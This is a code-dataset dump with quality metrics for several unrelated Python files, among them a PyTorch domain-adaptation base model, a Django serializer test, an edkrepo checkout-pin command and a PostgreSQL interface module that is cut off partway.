hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
df1c101105dbb3aa73b19593c5a7ea69af113861 | 3,710 | py | Python | models/base_model.py | weigq/UDA-1 | 4f97980980cafd0a2d02a77211ac7dbaf3e331f6 | [
"MIT"
] | 32 | 2021-11-08T15:45:30.000Z | 2022-03-30T09:08:57.000Z | models/base_model.py | weigq/UDA-1 | 4f97980980cafd0a2d02a77211ac7dbaf3e331f6 | [
"MIT"
] | 3 | 2021-11-16T02:38:51.000Z | 2022-02-21T13:29:58.000Z | models/base_model.py | weigq/UDA-1 | 4f97980980cafd0a2d02a77211ac7dbaf3e331f6 | [
"MIT"
] | 4 | 2021-11-09T02:53:18.000Z | 2021-12-21T22:11:35.000Z | # --------------------------------------------------------
# Copyright (c) 2021 Microsoft
# Licensed under The MIT License
# --------------------------------------------------------
import torch.nn as nn
from utils.torch_funcs import init_weights_fc, init_weights_fc0, init_weights_fc1, init_weights_fc2
__all__ = ['BaseModel']
class BaseModel(nn.Module):
def __init__(self,
num_classes: int = 1000,
hda: bool = False, # whether use hda head
toalign: bool = False, # whether use toalign
**kwargs
):
super().__init__()
self.num_classes = num_classes
self._fdim = None
# HDA
self.hda = hda
# toalign
self.toalign = toalign
def build_head(self):
# classification head
self.fc = nn.Linear(self.fdim, self.num_classes)
nn.init.kaiming_normal_(self.fc.weight)
if self.fc.bias is not None:
nn.init.zeros_(self.fc.bias)
# HDA head
if self.hda:
self.fc.apply(init_weights_fc)
self.fc0 = nn.Linear(self._fdim, self.num_classes)
self.fc0.apply(init_weights_fc0)
self.fc1 = nn.Linear(self._fdim, self.num_classes)
self.fc1.apply(init_weights_fc1)
self.fc2 = nn.Linear(self._fdim, self.num_classes)
self.fc2.apply(init_weights_fc2)
@property
def fdim(self) -> int:
return self._fdim
def get_backbone_parameters(self):
return []
def get_parameters(self):
parameter_list = self.get_backbone_parameters()
parameter_list.append({'params': self.fc.parameters(), 'lr_mult': 10})
if self.hda:
parameter_list.append({'params': self.fc0.parameters(), 'lr_mult': 10})
parameter_list.append({'params': self.fc1.parameters(), 'lr_mult': 10})
parameter_list.append({'params': self.fc2.parameters(), 'lr_mult': 10})
return parameter_list
def forward_backbone(self, x):
""" input x --> output feature """
return x
def _get_toalign_weight(self, f, labels=None):
assert labels is not None, f'labels should be asigned'
w = self.fc.weight[labels].detach() # [B, C]
if self.hda:
w0 = self.fc0.weight[labels].detach()
w1 = self.fc1.weight[labels].detach()
w2 = self.fc2.weight[labels].detach()
w = w - (w0 + w1 + w2)
eng_org = (f**2).sum(dim=1, keepdim=True) # [B, 1]
eng_aft = ((f*w)**2).sum(dim=1, keepdim=True) # [B, 1]
scalar = (eng_org / eng_aft).sqrt()
w_pos = w * scalar
return w_pos
def forward(self, x, toalign=False, labels=None) -> tuple:
"""
return: [f, y, ...]
"""
f = self.forward_backbone(x) # output feature [B, C]
assert f.dim() == 2, f'Expected dim of returned features to be 2, but found {f.dim()}'
if toalign:
w_pos = self._get_toalign_weight(f, labels=labels)
f_pos = f * w_pos
y_pos = self.fc(f_pos)
if self.hda:
z_pos0 = self.fc0(f_pos)
z_pos1 = self.fc1(f_pos)
z_pos2 = self.fc2(f_pos)
z_pos = z_pos0 + z_pos1 + z_pos2
return f_pos, y_pos - z_pos, z_pos
else:
return f_pos, y_pos
else:
y = self.fc(f)
if self.hda:
z0 = self.fc0(f)
z1 = self.fc1(f)
z2 = self.fc2(f)
z = z0 + z1 + z2
return f, y - z, z
else:
return f, y
| 33.125 | 99 | 0.523181 | 473 | 3,710 | 3.902748 | 0.238901 | 0.029252 | 0.045504 | 0.03467 | 0.191766 | 0.145179 | 0.145179 | 0.128927 | 0.050921 | 0 | 0 | 0.026656 | 0.332615 | 3,710 | 111 | 100 | 33.423423 | 0.718901 | 0.093531 | 0 | 0.098765 | 0 | 0 | 0.044277 | 0 | 0 | 0 | 0 | 0 | 0.024691 | 1 | 0.098765 | false | 0 | 0.024691 | 0.024691 | 0.246914 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df1dccd9ff34ca962f5ad0f1937db2627fe3e1bb | 955 | py | Python | amaascore/parties/fund.py | amaas-fintech/amaas-core-sdk-python | bd77884de6e5ab05d864638addeb4bb338a51183 | [
"Apache-2.0"
] | null | null | null | amaascore/parties/fund.py | amaas-fintech/amaas-core-sdk-python | bd77884de6e5ab05d864638addeb4bb338a51183 | [
"Apache-2.0"
] | 8 | 2017-06-06T09:42:41.000Z | 2018-01-16T10:16:16.000Z | amaascore/parties/fund.py | amaas-fintech/amaas-core-sdk-python | bd77884de6e5ab05d864638addeb4bb338a51183 | [
"Apache-2.0"
] | 8 | 2017-01-18T04:14:01.000Z | 2017-12-01T08:03:10.000Z | from __future__ import absolute_import, division, print_function, unicode_literals
from amaascore.parties.company import Company
class Fund(Company):
def __init__(self, asset_manager_id, party_id, base_currency, description='', party_status='Active',
display_name='', legal_name='', url='',
addresses=None, comments=None, emails=None, links=None, references=None,
*args, **kwargs):
super(Fund, self).__init__(asset_manager_id=asset_manager_id, party_id=party_id, base_currency=base_currency,
description=description, party_status=party_status,
display_name=display_name, legal_name=legal_name, url=url,
addresses=addresses, comments=comments, emails=emails,
links=links, references=references,
*args, **kwargs)
| 53.055556 | 117 | 0.60733 | 96 | 955 | 5.666667 | 0.40625 | 0.066176 | 0.077206 | 0.069853 | 0.134191 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.303665 | 955 | 17 | 118 | 56.176471 | 0.818045 | 0 | 0 | 0 | 0 | 0 | 0.006283 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.307692 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df1f7424ab7fa292579e8d0035b5a3d3e34ed234 | 1,127 | py | Python | django_flex_user/tests/serializers/test_phone_token_serializer.py | ebenh/django-flex-user | efffb21e4ce33d2ea8665756334e2a391f4b5a72 | [
"MIT"
] | 1 | 2021-09-13T20:26:02.000Z | 2021-09-13T20:26:02.000Z | django_flex_user/tests/serializers/test_phone_token_serializer.py | ebenh/django-flex-user | efffb21e4ce33d2ea8665756334e2a391f4b5a72 | [
"MIT"
] | null | null | null | django_flex_user/tests/serializers/test_phone_token_serializer.py | ebenh/django-flex-user | efffb21e4ce33d2ea8665756334e2a391f4b5a72 | [
"MIT"
] | null | null | null | from django.test import TestCase
class TestPhoneTokenSerializer(TestCase):
"""
This class is designed to test django_flex_user.serializers.PhoneTokenSerializer
"""
def setUp(self):
from django_flex_user.models.user import FlexUser
self.user = FlexUser.objects.create_user(phone='+12025550001')
def test_serialize(self):
from django_flex_user.serializers import PhoneTokenSerializer
from rest_framework.test import APIRequestFactory
from django.urls import reverse
# Dummy request for serializer context and building absolute URI's
request = APIRequestFactory().get('/')
# Get phone token
phone_token = self.user.phonetoken_set.first()
# Make sure the serializer only exposes the data we want it to
serializer = PhoneTokenSerializer(phone_token, context={'request': request})
self.assertEqual(
serializer.data,
{
'name': '+*********01',
'uri': f'{request.build_absolute_uri(reverse("phone-token", args=(phone_token.id,)))}'
}
)
| 33.147059 | 102 | 0.652174 | 121 | 1,127 | 5.950413 | 0.504132 | 0.069444 | 0.058333 | 0.069444 | 0.061111 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015458 | 0.253771 | 1,127 | 33 | 103 | 34.151515 | 0.840666 | 0.19787 | 0 | 0 | 0 | 0 | 0.129797 | 0.08465 | 0 | 0 | 0 | 0 | 0.052632 | 1 | 0.105263 | false | 0 | 0.263158 | 0 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df2229a266aa3449cafdcf8c1cb50cc3ad9193bc | 367 | py | Python | validation_messages.py | PaulinaKomorek/Order-Form | 7c56852e4367d6dd80fd9b500bf4e4ae4d4e06f6 | [
"MIT"
] | 1 | 2020-04-13T12:25:53.000Z | 2020-04-13T12:25:53.000Z | validation_messages.py | PaulinaKomorek/Order-Form | 7c56852e4367d6dd80fd9b500bf4e4ae4d4e06f6 | [
"MIT"
] | null | null | null | validation_messages.py | PaulinaKomorek/Order-Form | 7c56852e4367d6dd80fd9b500bf4e4ae4d4e06f6 | [
"MIT"
] | null | null | null | validation_messages = {
"en":
{
"e-mail": "Invalid e-mail address.",
"telephone": "Invalid telephone number.",
"code": "Invalid postal code."
},
"pl":
{
"e-mail": "Niewłaściwy adres e-mail.",
"telephone": "Niewłaściwy format numeru telefonu.",
"code": "Niewłaściwy format kodu pocztowego."
}
}
| 22.9375 | 59 | 0.544959 | 34 | 367 | 5.852941 | 0.558824 | 0.100503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.297003 | 367 | 15 | 60 | 24.466667 | 0.771318 | 0 | 0 | 0 | 0 | 0 | 0.558583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df22cf9c0f6508e6a9593a1891b29ac8e1818c64 | 637 | py | Python | python/1021_remove_outermost_parentheses.py | liaison/LeetCode | 8b10a1f6bbeb3ebfda99248994f7c325140ee2fd | [
"MIT"
] | 17 | 2016-03-01T22:40:53.000Z | 2021-04-19T02:15:03.000Z | python/1021_remove_outermost_parentheses.py | liaison/LeetCode | 8b10a1f6bbeb3ebfda99248994f7c325140ee2fd | [
"MIT"
] | null | null | null | python/1021_remove_outermost_parentheses.py | liaison/LeetCode | 8b10a1f6bbeb3ebfda99248994f7c325140ee2fd | [
"MIT"
] | 3 | 2019-03-07T03:48:43.000Z | 2020-04-05T01:11:36.000Z | class Solution:
def removeOuterParentheses(self, s: str) -> str:
stack = []
start = 0
primitives = []
# retrieve all the primitives
for index, letter in enumerate(s):
if letter == "(":
stack.append(letter)
else:
stack.pop()
if len(stack) == 0:
primitives.append(s[start:index+1])
start = index + 1
# strip the outermost parentheses
stripped = []
for primitive in primitives:
stripped.append(primitive[1:-1])
return "".join(stripped)
| 26.541667 | 55 | 0.486656 | 60 | 637 | 5.166667 | 0.533333 | 0.070968 | 0.070968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016043 | 0.412873 | 637 | 23 | 56 | 27.695652 | 0.812834 | 0.092622 | 0 | 0 | 0 | 0 | 0.001742 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df234c85802f9c15bc9466661d8b752a7a594bd0 | 8,009 | py | Python | edkrepo/commands/checkout_pin_command.py | nate-desimone/edk2-edkrepo | a3f30d275afce0467a38b3d2e3194a710f8c0e22 | [
"BSD-2-Clause-Patent"
] | 4 | 2021-04-18T22:04:59.000Z | 2022-03-31T03:59:17.000Z | edkrepo/commands/checkout_pin_command.py | nate-desimone/edk2-edkrepo | a3f30d275afce0467a38b3d2e3194a710f8c0e22 | [
"BSD-2-Clause-Patent"
] | 19 | 2021-04-06T21:07:29.000Z | 2022-03-25T17:17:25.000Z | edkrepo/commands/checkout_pin_command.py | nate-desimone/edk2-edkrepo | a3f30d275afce0467a38b3d2e3194a710f8c0e22 | [
"BSD-2-Clause-Patent"
] | 9 | 2021-03-16T23:13:09.000Z | 2021-11-20T09:19:38.000Z | #!/usr/bin/env python3
#
## @file
# checkout_pin_command.py
#
# Copyright (c) 2017 - 2020, Intel Corporation. All rights reserved.<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
import os
from git import Repo
from edkrepo.commands.edkrepo_command import EdkrepoCommand, OverrideArgument, SourceManifestRepoArgument
import edkrepo.commands.arguments.checkout_pin_args as arguments
import edkrepo.commands.humble.checkout_pin_humble as humble
from edkrepo.common.common_cache_functions import get_repo_cache_obj
from edkrepo.common.common_repo_functions import sparse_checkout_enabled, reset_sparse_checkout, sparse_checkout
from edkrepo.common.common_repo_functions import check_dirty_repos, checkout_repos, combinations_in_manifest
from edkrepo.common.humble import SPARSE_CHECKOUT, SPARSE_RESET, SUBMODULE_DEINIT_FAILED
from edkrepo.common.edkrepo_exception import EdkrepoInvalidParametersException, EdkrepoProjectMismatchException
from edkrepo.common.workspace_maintenance.manifest_repos_maintenance import list_available_manifest_repos
from edkrepo.common.workspace_maintenance.manifest_repos_maintenance import find_source_manifest_repo
from edkrepo.config.config_factory import get_workspace_path, get_workspace_manifest
from edkrepo.config.tool_config import SUBMODULE_CACHE_REPO_NAME
from edkrepo_manifest_parser.edk_manifest import ManifestXml
from project_utils.submodule import deinit_full, maintain_submodules
import edkrepo.common.ui_functions as ui_functions
class CheckoutPinCommand(EdkrepoCommand):
def __init__(self):
super().__init__()
def get_metadata(self):
metadata = {}
metadata['name'] = 'checkout-pin'
metadata['help-text'] = arguments.COMMAND_DESCRIPTION
metadata['alias'] = 'chp'
args = []
metadata['arguments'] = args
args.append({'name' : 'pinfile',
'positional' : True,
'position' : 0,
'required' : True,
'help-text' : arguments.PIN_FILE_HELP})
args.append(OverrideArgument)
args.append(SourceManifestRepoArgument)
return metadata
def run_command(self, args, config):
workspace_path = get_workspace_path()
manifest = get_workspace_manifest()
manifest_repo = find_source_manifest_repo(manifest, config['cfg_file'], config['user_cfg_file'], args.source_manifest_repo)
cfg, user_cfg, conflicts = list_available_manifest_repos(config['cfg_file'], config['user_cfg_file'])
if manifest_repo in cfg:
manifest_repo_path = config['cfg_file'].manifest_repo_abs_path(manifest_repo)
elif manifest_repo in user_cfg:
manifest_repo_path = config['user_cfg_file'].manifest_repo_abs_path(manifest_repo)
else:
manifest_repo_path = None
pin_path = self.__get_pin_path(args, workspace_path, manifest_repo_path, manifest)
pin = ManifestXml(pin_path)
manifest_sources = manifest.get_repo_sources(manifest.general_config.current_combo)
check_dirty_repos(manifest, workspace_path)
for source in manifest_sources:
local_path = os.path.join(workspace_path, source.root)
repo = Repo(local_path)
origin = repo.remotes.origin
origin.fetch()
self.__pin_matches_project(pin, manifest, workspace_path)
sparse_enabled = sparse_checkout_enabled(workspace_path, manifest_sources)
if sparse_enabled:
ui_functions.print_info_msg(SPARSE_RESET, header = False)
reset_sparse_checkout(workspace_path, manifest_sources)
submodule_combo = pin.general_config.current_combo
try:
deinit_full(workspace_path, manifest, args.verbose)
except Exception as e:
ui_functions.print_error_msg(SUBMODULE_DEINIT_FAILED, header = False)
if args.verbose:
ui_functions.print_error_msg(e, header = False)
pin_repo_sources = pin.get_repo_sources(pin.general_config.current_combo)
try:
checkout_repos(args.verbose, args.override, pin_repo_sources, workspace_path, manifest)
manifest.write_current_combo(humble.PIN_COMBO.format(args.pinfile))
finally:
cache_path = None
cache_obj = get_repo_cache_obj(config)
if cache_obj is not None:
cache_path = cache_obj.get_cache_path(SUBMODULE_CACHE_REPO_NAME)
maintain_submodules(workspace_path, pin, submodule_combo, args.verbose, cache_path)
if sparse_enabled:
ui_functions.print_info_msg(SPARSE_CHECKOUT, header = False)
sparse_checkout(workspace_path, pin_repo_sources, manifest)
def __get_pin_path(self, args, workspace_path, manifest_repo_path, manifest):
if os.path.isabs(args.pinfile) and os.path.isfile(args.pinfile):
return os.path.normpath(args.pinfile)
elif manifest_repo_path is not None and os.path.isfile(os.path.join(manifest_repo_path, os.path.normpath(manifest.general_config.pin_path), args.pinfile)):
return os.path.join(manifest_repo_path, os.path.normpath(manifest.general_config.pin_path), args.pinfile)
elif manifest_repo_path is not None and os.path.isfile(os.path.join(manifest_repo_path, args.pinfile)):
return os.path.join(manifest_repo_path, args.pinfile)
elif os.path.isfile(os.path.join(workspace_path, args.pinfile)):
return os.path.join(workspace_path, args.pinfile)
elif os.path.isfile(os.path.join(workspace_path, 'repo', args.pinfile)):
return os.path.join(workspace_path, 'repo', args.pinfile)
elif not os.path.isfile(os.path.join(workspace_path, args.pinfile)) and os.path.dirname(args.pinfile) is None:
for dirpath, dirnames, filenames in os.walk(workspace_path):
if args.pinfile in filenames:
return os.path.join(dirpath, args.pinfile)
else:
raise EdkrepoInvalidParametersException(humble.NOT_FOUND)
def __pin_matches_project(self, pin, manifest, workspace_path):
if pin.project_info.codename != manifest.project_info.codename:
raise EdkrepoProjectMismatchException(humble.MANIFEST_MISMATCH)
elif not set(pin.remotes).issubset(set(manifest.remotes)):
raise EdkrepoProjectMismatchException(humble.MANIFEST_MISMATCH)
elif pin.general_config.current_combo not in combinations_in_manifest(manifest):
ui_functions.print_warning_msg(humble.COMBO_NOT_FOUND.format(pin.general_config.current_combo), header = False)
combo_name = pin.general_config.current_combo
pin_sources = pin.get_repo_sources(combo_name)
pin_root_remote = {source.root:source.remote_name for source in pin_sources}
try:
# If the pin and the project manifest have the same combo get the
# repo sources from that combo. Otherwise get the default combo's
# repo sources
manifest_sources = manifest.get_repo_sources(combo_name)
except ValueError:
manifest_sources = manifest.get_repo_sources(manifest.general_config.default_combo)
manifest_root_remote = {source.root:source.remote_name for source in manifest_sources}
if set(pin_root_remote.items()).isdisjoint(set(manifest_root_remote.items())):
raise EdkrepoProjectMismatchException(humble.MANIFEST_MISMATCH)
pin_root_commit = {source.root:source.commit for source in pin_sources}
for source in pin_sources:
source_repo_path = os.path.join(workspace_path, source.root)
repo = Repo(source_repo_path)
if repo.commit(pin_root_commit[source.root]) is None:
raise EdkrepoProjectMismatchException(humble.NOT_FOUND)
| 55.618056 | 164 | 0.710326 | 972 | 8,009 | 5.547325 | 0.169753 | 0.025593 | 0.022255 | 0.024666 | 0.393361 | 0.301187 | 0.259829 | 0.217915 | 0.188242 | 0.125556 | 0 | 0.001747 | 0.213635 | 8,009 | 143 | 165 | 56.006993 | 0.854398 | 0.038457 | 0 | 0.083333 | 0 | 0 | 0.021071 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.141667 | 0 | 0.25 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df24d31f00fafdf9649aee8146b7fac334d4cd87 | 634 | py | Python | multiple_futures_prediction/cmd/train_carla_cmd.py | cpacker/multiple-futures-prediction-carla | dfc97ab6d55976f86509883c7541b0920266472e | [
"AML"
] | 6 | 2021-07-29T03:36:50.000Z | 2022-03-07T21:13:25.000Z | multiple_futures_prediction/cmd/train_carla_cmd.py | cpacker/multiple-futures-prediction-carla | dfc97ab6d55976f86509883c7541b0920266472e | [
"AML"
] | 1 | 2021-11-04T14:31:58.000Z | 2021-11-25T07:42:54.000Z | multiple_futures_prediction/cmd/train_carla_cmd.py | cpacker/multiple-futures-prediction-carla | dfc97ab6d55976f86509883c7541b0920266472e | [
"AML"
] | 1 | 2021-08-11T08:36:54.000Z | 2021-08-11T08:36:54.000Z | from typing import List, Set, Dict, Tuple, Optional, Union, Any
from multiple_futures_prediction.train_carla import train, Params
import gin
import argparse
def parse_args() -> Any:
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--config', type=str, default='')
return parser.parse_args()
def main() -> None:
args = parse_args()
gin.parse_config_file(args.config)
params = Params()()
train(params)
# python -m multiple_futures_prediction.cmd.train_carla_cmd --config multiple_futures_prediction/configs/mfp2_carla.gin
if __name__ == '__main__':
main()
| 31.7 | 119 | 0.774448 | 82 | 634 | 5.682927 | 0.52439 | 0.096567 | 0.160944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001783 | 0.115142 | 634 | 19 | 120 | 33.368421 | 0.828877 | 0.184543 | 0 | 0 | 0 | 0 | 0.031068 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.266667 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df250a4194a7dab451b6efac9277905f30e795d0 | 9,263 | py | Python | DynamicETLDashboard/DynamicETL_Dashboard/Database/postgres.py | BRutan/DynamicETLDashboard | 8a40e6f51e53f084d6103ba41cd675916505652f | [
"MIT"
] | null | null | null | DynamicETLDashboard/DynamicETL_Dashboard/Database/postgres.py | BRutan/DynamicETLDashboard | 8a40e6f51e53f084d6103ba41cd675916505652f | [
"MIT"
] | null | null | null | DynamicETLDashboard/DynamicETL_Dashboard/Database/postgres.py | BRutan/DynamicETLDashboard | 8a40e6f51e53f084d6103ba41cd675916505652f | [
"MIT"
] | null | null | null | #####################################
# Database/postgres.py
#####################################
# Description:
# * Objects related to interacting
# with SQL database that uses PostGres
# as SQL flavor language.
from Database.base import DBInterface, TableObject
from Database.columnattributes import ColumnAttributesGenerator
from pandas import read_csv, DataFrame, Series
import psycopg2
import os
class PostGresInterface(DBInterface):
"""
* Interface into PostGRES SQL database.
"""
def __init__(self, dbname, user, password):
"""
* Initiate new connection.
"""
connect = psycopg2.connect('dbname=%s user=%s' % (dbname, user, password))
super().__init__(connect)
##############
# Properties:
##############
##############
# Interface Methods:
##############
def Execute(self, query, returnsvals = False):
"""
* Execute non-SELECT/INSERT query.
Inputs:
* query: string SQL query.
Optional:
* returnsvals: Put True if expecting query to return
values.
"""
errs = []
if not isinstance(query, str):
errs.append('query must be a string.')
if not isinstance(returnsvals, bool):
errs.append('returnsvals must be a boolean.')
if errs:
raise ValueError(','.join(errs))
try:
if returnsvals:
return super().Cursor.execute(query)
else:
super().Cursor.execute(query)
except Exception as ex:
raise RuntimeError('Failed to execute. Reason: %s' % str(ex))
def GetAllTableAttributes(self, schema = None, table = None):
"""
* Return table attributes for schema.
Optional:
* schema: Name of specific schema (string).
* table: Name of specific table (string).
"""
if not schema is None and not isinstance(schema, str):
raise ValueError('schema must be a string if provided.')
query = ['SELECT * FROM information_schema.columns']
opt = []
if not schema is None:
opt.append('schema = %s' % schema)
if not table is None:
opt.append('table = %s' % table)
if opt:
query.extend(opt)
try:
results = self.Execute(' '.join(query), True)
except Exception as ex:
pass
# Return as derived TableObject:
out = PostGresTable(table, '', schema)
out.GenerateTableDef()
return out
class PostGresTable(TableObject):
"""
* Contains column names and meta
attributes for PostGresSQL tables.
"""
def __init__(self, name, dbname, server):
"""
* Contains column names and meta
attributes for T-SQL tables.
"""
super().__init__(name, dbname, server, 'postgresql')
################
# Interface Methods:
################
@staticmethod
def GenerateTableDef(df, tablename, std_names = False, outpath = None, templatedef = False, template = None):
"""
* Convert passed dataframe with dtypes into
CREATE TABLE script with appropriate types for PostGresSQL.
Inputs:
* df: Pandas dataframe containing data to store in PostGresSQL table.
* tablename: string name for table.
Optional:
* std_names: lowercase all column names and replace with underscores.
* outpath: string path to output table definition.
* templatedef: put True to include a "template" table definition
with character varying as all types.
* template: path to file to insert table definition.
Must have one %s placed to indicate where to place
table definition.
"""
errs = []
if not isinstance(df, DataFrame):
errs.append('df must be a DataFrame.')
if not isinstance(tablename, str):
errs.append('tablename must be a string.')
if not isinstance(std_names, bool):
errs.append('std_names must be boolean.')
if not outpath is None and not isinstance(outpath, str):
errs.append('outpath must be a string if provided.')
elif not outpath.endswith('\\'):
outpath += '\\'
if not template is None:
if not isinstance(template, str):
errs.append('template must be a string path if provided.')
elif not os.path.exists(template):
errs.append('template does not exist at path.')
